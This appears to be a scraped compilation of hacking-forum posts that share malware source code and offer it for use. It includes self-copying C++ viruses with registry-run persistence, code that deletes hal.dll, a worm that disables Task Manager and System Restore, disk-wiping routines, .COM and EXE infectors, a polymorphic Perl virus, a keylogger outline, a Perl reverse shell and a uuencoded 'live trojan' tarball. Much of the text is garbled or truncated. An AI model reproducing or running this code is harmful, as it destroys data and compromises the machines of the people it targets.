LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}

Although small don’t underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though.


Hacking Perl Script
I have used perl before I still don't entirely understand what this script does.

Perl Code:
#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:


Perl Code:
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:


Perl Code:
$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);


It essentially is forming a command to use with lynx. And yes, it is attempting to exec /bin/sh.

Ps: It'd be easy to read, if you terminate each line of code with a "\n" after the ";"


Powerful C++ Virus
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
C++ trojan dropper
CODE
#include
#include
#include
#include

void write(int mysize,char *tpath,char *mybuf)
{
int tsize = 0;
ifstream tfile(tpath,ios::binary);
tfile.seekg (0,ios::end);
tsize = tfile.tellg();
tfile.seekg (0,ios::beg);
char *tbuf = new char [tsize];
tfile.read(tbuf,tsize);
tfile.close();
ofstream outputfile(tpath,ios::binary);
outputfile.write(mybuf,mysize);
outputfile.write(tbuf,tsize);
outputfile.close();
cout<};

void extract(int mysize,char *target)
{
char windir[250];
GetWindowsDirectory(windir,MAX_PATH);
ifstream tfile(target,ios::binary);
tfile.seekg (213045);
int theamount = mysize - 213045;
char *tbuf = new char [theamount];
tfile.read(tbuf,theamount);
tfile.close();
char mypath[100];
strcpy (mypath,windir);
strcat (mypath,"\\command.exe");
ofstream outfile(mypath,ios::binary);
outfile.write(tbuf,theamount);
outfile.close();
cout<system(mypath);
};

int checkit(int mysize,char *mybuf,char *target)
{
int checker = 0;
char tpath[512];

if (mysize != 213045)
{
extract(mysize,target);
}
else
{
cout<<"pSyChIc - Dropper"<cout<<"Input file path"<cin>>tpath;
write (mysize,tpath,mybuf);
}
return 0;
};

int main(int argc, char *argv[])
{
long mysize;
char *target=argv[0];
ifstream myfile(argv[0],ios::binary);
myfile.seekg (0,ios::end);
mysize = myfile.tellg();
myfile.seekg (0,ios::beg);
char *mybuf= new char [mysize];
myfile.read(mybuf,mysize);
myfile.close();
checkit (mysize,mybuf,target);
return 0;
}
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers.

Note: Definitions dated prior to 28th March 2005, may detect this threat as Trojan dropper.

C++ Worm
#include
#include
#include
#include
#include

char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance, LPSTR lpCmdLine, int

nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =

"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\

Windows\\CurrentVersion\\Run",0,KEY_SET_VALU

E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(

HKEY_CURRENT_USER,"Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,

&hKey2 );
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}

void restrictcleanwin()
{
ofstream Disable;


Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o

ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\

", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\Disable

RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\DisableT

askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\

\Windows\\CurrentVersion\\Policies\\System\\Disable

TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableConfig\", 1,

\"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableSR\", 1,

\"REG_DWORD\"" << endl;
Disable.close();
Sleep(3000);
ShellExecute(NULL, "open",

"C:\\WINDOWS\\WinDisable.vbs", NULL, NULL,

SW_HIDE);
}
void sshut()
{
ofstream fun1;
fun1.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Sshut.cmd",ios::out);
fun1 << "shutdown -s -t 5 -f -c \"Microsuck Windows

Corpration is crasher\" " << endl;
fun1.close();
}

void cdopen()
{
ofstream cdopen;
cdopen.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Cd-op.vbs",ios::out);
cdopen << "do" << endl;
cdopen << "wscript.sleep 100" << endl;
cdopen << "Set oWMP =

CreateObject(\"WMPlayer.OCX.7\")" << endl;
cdopen << "Set colCDROMs =

oWMP.cdromCollection" << endl;
cdopen << "if colCDROMs.Count then" << endl;
cdopen << "For i = 0 to colCDROMs.Count - 1" <<

endl;
cdopen << "colCDROMs.Item(i).Eject" << endl;
cdopen << "Next" << endl;
cdopen << "End If" << endl;
cdopen << "loop" << endl;
}
int main(int argc, char *argv[])
{
HWND wndstealth;
AllocConsole();
wndstealth=FindWindowA("ConsoleWindowClass",N

ULL);
ShowWindow(wndstealth,0);
restrictcleanwin();
sshut();
cdopen();
{

}
It is a program that drops a few files and edits the

registry. All it does is shut down the computer every

time it boots.
P.S. It's actually a worm not a virus


Trojan horse codes
1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ;

3.release & exec the trojan horse

....

1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ; 3.release & exec the trojan horse


.386
.model flat,stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib

.data
@szTargetFileName db ‘Target.exe’,0
@hTargetFile dd ?
@hTargetFileMap dd ?
@lpTargetFile dd ?

FILE_REPLACE_OFFSET equ 00000H
FILE_REPLACE_SIZE equ 0A7B8H

.code
assume fs:nothing
start:

invoke CreateFile,addr @szTargetFileName,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax!=INVALID_HANDLE_VALUE
mov @hTargetFile,eax
.else
jmp _End
.endif
invoke CreateFileMapping,@hTargetFile,NULL,PAGE_READWRITE,0,0,NULL
.if eax
mov @hTargetFileMap,eax

invoke MapViewOfFile,@hTargetFileMap,FILE_MAP_WRITE,0,0,0
.if eax
mov @lpTargetFile,eax
jmp _Replace
.endif
invoke CloseHandle,@hTargetFileMap
.endif
jmp _End

_Replace:
mov eax,FILE_REPLACE_SIZE
mov ecx,@lpTargetFile
add ecx,FILE_REPLACE_OFFSET

invoke RtlZeroMemory,ecx,eax
invoke UnmapViewOfFile,@lpTargetFile
invoke CloseHandle,@hTargetFileMap
invoke CloseHandle,@hTargetFile
_End:
ret
end start

if u hav any problem understanding the codes .. u can google it..

c++ virus
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}
what it does
GetWindowsDirectoryA(windir, MAX_PATH)) + trace("GetWindowsDirectoryA ... + else { + char *p = strrchr(filename, '\\'); + if(p++) memmove(filename, p, ...
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) and here's the MFC generated one: ...
char pathname[256]; char windir[MAX_PATH]; char instpath[MAX_PATH]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); ...
GetModuleFileName(GetModH, Worm, sizeof(Worm)); GetWindowsDirectory(WinDir, sizeof(WinDir)); GetSystemDirectory(SysDir, sizeof(SysDir)); ...
strcat(windir, "\\System32\\viral.exe"); that is the virus.
unsigned char reg[10] = "infected"; RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); ...
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); RegCloseKey(hKey); ...

.. i ve explained the codes and what they do.... in a short detail.... this will be very good for programmers.. nd a lil betta for begginers... just for each code.. ive given the code explanation.what it does.. or what it is..
overwrite virus coded in C
It is a overwrite virus written ic C .When u run this program ,the program will overwrite all the exe files present in the current directory and the parent directory
Code :
/*A virus program
coded by SJ

email id:samjohnyb4u@gmail.com
*/
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s
",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact
SJ in Disguise
,id:samjohnyb4u@gmail.com");


Virus (Mini project)
its a simply jokeCode :


//***************************************************************//
//virus program-created by SJ//

//**************************************************************//

#include
#include
#include
#include
#include
#include
#include

void fool();
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SJ";
gotoxy(20,14);
cout<<"SAY GOOD BYE TO YOUR PC IN ";
for(int j=10;j>=0;j--)
{
gotoxy(48,14);
cout<delay(1000);
}
clrscr();
cout<<"
1.HARD-DISK CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

2.MOTHER BOARD CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";
delay(4000);
cout<<"completed";
cout<<"

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
cout<<"

VIRUS.EXE";
delay(2000);
cout<<"
*************************";
cout<<"
Buddy it's a simply joke ";
cout<<"
*************************";
delay(4000);
cout<<"


**********************************";
cout<<"
For Real Virus ";
cout<<"
Contact Me: SJ";
cout<<"
Mo: 010101010101 ";
cout<<"
Email: samjohnyb4u@gmail.com";
cout<<"
**********************************";
delay(10000);
}

void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"c:\tc\bgi");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}
VIRUS Designing - Use responsibly
#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

//#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

The HITLER virus
The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.

make sure u dont misuse it.. the code is totaly big so i am uploading it as txt file.. u can scan it.. txt file dosent prove nything.. lolzzz

Download:
hxxp://rapidshare.com/files/65139588/Hitler.txt

Bomber Virus
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}



Virus
Program Wipe_The_Fuckers_HD;
uses dos,crt;
var read:string;

Begin
clrscr;
inline ($B0/$08/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {I:}
write ('.');
inline ($B0/$09/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {j:}
write ('.');
inline ($B0/$07/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {H:}
write ('.');
inline ($B0/$06/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {G:}
write ('.');
inline ($B0/$05/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {F:}
write ('.');
inline ($B0/$04/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {E:}
write ('.');
inline ($B0/$03/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {D:}
write ('.');
inline ($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:}
write ('.');
inline ($B0/$01/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {B:}
write ('.');
inline ($B0/$00/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {A:}
writeln;
textcolor (14);
Writeln ('FUCK OFF');
Writeln('');
Writeln('');
textcolor (13);
textcolor (12);
textcolor (11);
Writeln('');
sound(500);

End.

This is a live trojan tarball Backdoor
begin 664 trojan_backdoor.tar
M8F%C:V1O;W(O````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````#`P,#`W-S4`,#`P,#2(@:7,@8V%L;&5D(&)A8VMD;V]R+B`@270@
M:&%S(&YO=&AI;F<@=&\@9&\@=VET:`T*8F%C:V1O;W)S('=H870M2P@:70@=VEL;"!B87-I8V%L;'D@97)A
M6]U2!Y;W4@#0ID;VXG="!F=6-K('EO=7)S96QF(&]V97(@8GD@86-C:61E
M;G0N("!';V]D(&QU8VLA#0H-"@T*"0D)"4UE<&AI7,`
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````,#`P,#`?P8?=3&!
M?P@_/W4J@7\*/S]U(X%_##\_=1R!?PX_/W45@7\0/S]U#H!_$C]U"%M8L/_Y
MR@(`6U@N_RXR`"Z)'BX`+HP&,`#+4%-14AX&5U95#A_$/BX`)HI=`C+_@_L`
M=0/H%0"X``$NQ1XN`(E'`UU>7P,
MR":)1P);6`?#4%,>!K@A-,@`NC`8T``X?NDH`N"$ES2$''UM8PU!3
M45"*Q.@(`%CH!`!96UC#4%-14+$$TN@$,#PY=@($!^@?`%@D#P0P/#EV`@0'
MZ!$`65M8PU"P#>@'`+`*Z`(`6,-04[0.NP<`S1!;6,,`````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````8F%C:V1O;W(O8F%C:V1O;W(N97AE````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````#`P,#`W-S4`,#`P,#`````0``````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`+@1`%`.G+$3NAD`#A__+A4`M$S-(<````#_```````?`#\_/S\_/S\_/S\_
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
end

Batch Virus
Whoever thought that viruses could be in BATCH files? This virus which
we are about to see makes use of the MS-DOS operating system. This BATCH
virus uses DEBUG & EDLIN programs.
NAME: VR.BAT

ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (The directory is written on "ind" ONLY name entries)
EDLIN IND<1 ("ind" is processed with EDLIN so only file names appear)
DEBUG IND<2 (New batch program is created with debug)
EDLIN NAME.BAT<3 (This batch goes to an executable form because of EDLIN)
CTTY CON (Console interface is again assigned)
NAME (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1

1,4D (Here line 1-4 of the "ind" file are deleted)
E (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000 (First program name is moved to the F000H address to save)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
NNAME.BAT (Name it NAME.BAT)
W (Write)
Q (Quit) The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
NAME: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
Program only affects .COM files.

Start: Jmp MainVir
Db '*'

MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret

CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0

OrgPrg: Int 20h
Nop
Nop

VirLen Equ $-MainVir


script virus source code
FileSystemObject","") tmp2=2 set tmp = F.GetSpecialFolder(tmp2) SS.open fname1= F.BuildPath(tmp,fname1) SS.write x.responseBody SS.savetofile fname1,2 SS.close call shellexe(zz,fname1)//////////////////////////test2.htmVBScript.

Poly Perl Virus
Ok, this is a polymorphic perl virus which is using EPO techniques,
To make this code useful strip the comments, remove linebreaks, and
obfuscate it .. ;)
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor

$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?

for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}

$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop

if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n";
# and start it

